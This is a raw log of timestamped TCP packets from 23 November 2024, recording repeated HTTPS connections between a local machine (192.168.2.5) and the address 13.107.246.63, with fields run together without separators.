                                                                                                                                                                                          Nov 23, 2024 17:45:28.026659012 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.026711941 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.026741028 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.026752949 CET49917443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.026760101 CET4434991713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.030157089 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.030217886 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.030314922 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.030477047 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.030495882 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.274703979 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.277913094 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.278036118 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.278122902 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.278122902 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.278172970 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.278201103 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.281605005 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.281665087 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.281747103 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.281963110 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.281980038 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.335361004 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.338761091 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.338846922 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.338968039 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.339034081 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.339071989 CET49918443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.339091063 CET4434991813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.342976093 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.343013048 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:28.343089104 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.343292952 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:28.343308926 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:29.454482079 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:29.455127001 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:29.455163956 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:29.455612898 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:29.455619097 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:29.784198999 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:29.784836054 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:29.784856081 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:29.785252094 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:29.785257101 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102196932 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102303028 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102483034 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102600098 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102624893 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102637053 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.102643013 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.105556011 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.105652094 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.105742931 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.105899096 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.105920076 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.111160040 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.111548901 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.111579895 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.112020016 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.112025976 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.259269953 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.265113115 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.265322924 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.265322924 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.265322924 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.268201113 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.268264055 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.268348932 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.268542051 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.268558979 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.473001003 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.473670006 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.473701000 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.474196911 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.474205017 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.484441996 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.484834909 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.484870911 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.485407114 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.485413074 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.576724052 CET49919443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.576759100 CET4434991913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.602102995 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605484962 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605583906 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605601072 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605690002 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605776072 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605776072 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605803967 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.605823040 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.609289885 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.609349012 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.609438896 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.609621048 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.609637976 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922017097 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922051907 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922096014 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922152996 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922208071 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922476053 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922499895 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922513008 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.922518015 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.925703049 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.925745964 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.925844908 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.925980091 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.925992012 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.950742960 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.953912973 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.954001904 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.954101086 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.954128027 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.954145908 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.954154015 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.956733942 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.956778049 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:30.956924915 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.957035065 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:30.957050085 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:31.969336033 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:31.969923973 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:31.969953060 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:31.970593929 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:31.970599890 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.058684111 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.059179068 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.059201002 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.059613943 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.059618950 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.350059032 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.350754023 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.350836992 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.351249933 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.351269960 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.539005995 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.542251110 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.542366028 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.542468071 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.542468071 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.542516947 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.542548895 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.545857906 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.545913935 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.545998096 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.546191931 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.546206951 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.606534004 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.610306978 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.610397100 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.615087032 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.615108967 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.615120888 CET49925443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.615127087 CET4434992513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.619155884 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.619196892 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.619292021 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.619457006 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.619474888 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.694937944 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.695460081 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.695480108 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.696094036 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.696098089 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.737946033 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.738439083 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.738473892 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.738877058 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.738884926 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.788855076 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.791960955 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.792071104 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.792160988 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.792160988 CET49926443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.792210102 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.792253971 CET4434992613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.795416117 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.795470953 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:32.795562983 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.795826912 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:32.795851946 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.204807043 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.207847118 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.207936049 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.208002090 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.208002090 CET49928443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.208028078 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.208030939 CET4434992813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.222009897 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.222110033 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.222364902 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.222644091 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.222693920 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.344069004 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.347095013 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.347168922 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.347239971 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.347261906 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.347273111 CET49927443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.347278118 CET4434992713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.350533009 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.350575924 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:33.350651026 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.350837946 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:33.350856066 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.401420116 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.402290106 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.402308941 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.402980089 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.402988911 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.490044117 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.490752935 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.490765095 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.491178989 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.491183996 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.643836021 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.644445896 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.644484043 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.644989014 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.644996881 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.860255003 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.863785982 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.863861084 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.863955021 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.863979101 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.863992929 CET49929443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.864001036 CET4434992913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.867458105 CET49934443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.867572069 CET4434993413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.867667913 CET49934443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.867841005 CET49934443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.867877960 CET4434993413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.940941095 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.945799112 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.945894957 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.975399017 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.975399017 CET49930443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.975431919 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.975440979 CET4434993013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.978940010 CET49935443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.979002953 CET4434993513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:34.979084015 CET49935443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.979260921 CET49935443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:34.979280949 CET4434993513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.005448103 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.006010056 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.006088972 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.006656885 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.006669044 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.086311102 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.089735031 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.089792967 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.089818954 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.089859962 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.089907885 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.098807096 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.098829985 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.098845005 CET49931443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.098855019 CET4434993113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.151593924 CET49936443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.151647091 CET4434993613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.151726961 CET49936443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.166349888 CET49936443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.166379929 CET4434993613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.224735022 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.261600018 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.261621952 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.271384954 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.271394968 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.480020046 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.483936071 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.484023094 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.484225988 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.484280109 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.484312057 CET49932443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.484328032 CET4434993213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.491034985 CET49937443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.491080046 CET4434993713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.491142035 CET49937443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.491493940 CET49937443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.491511106 CET4434993713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.668267012 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.671415091 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.671478987 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.671574116 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.671583891 CET4434993313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:35.671601057 CET49933443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:35.671606064 CET4434993313.107.246.63192.168.2.5
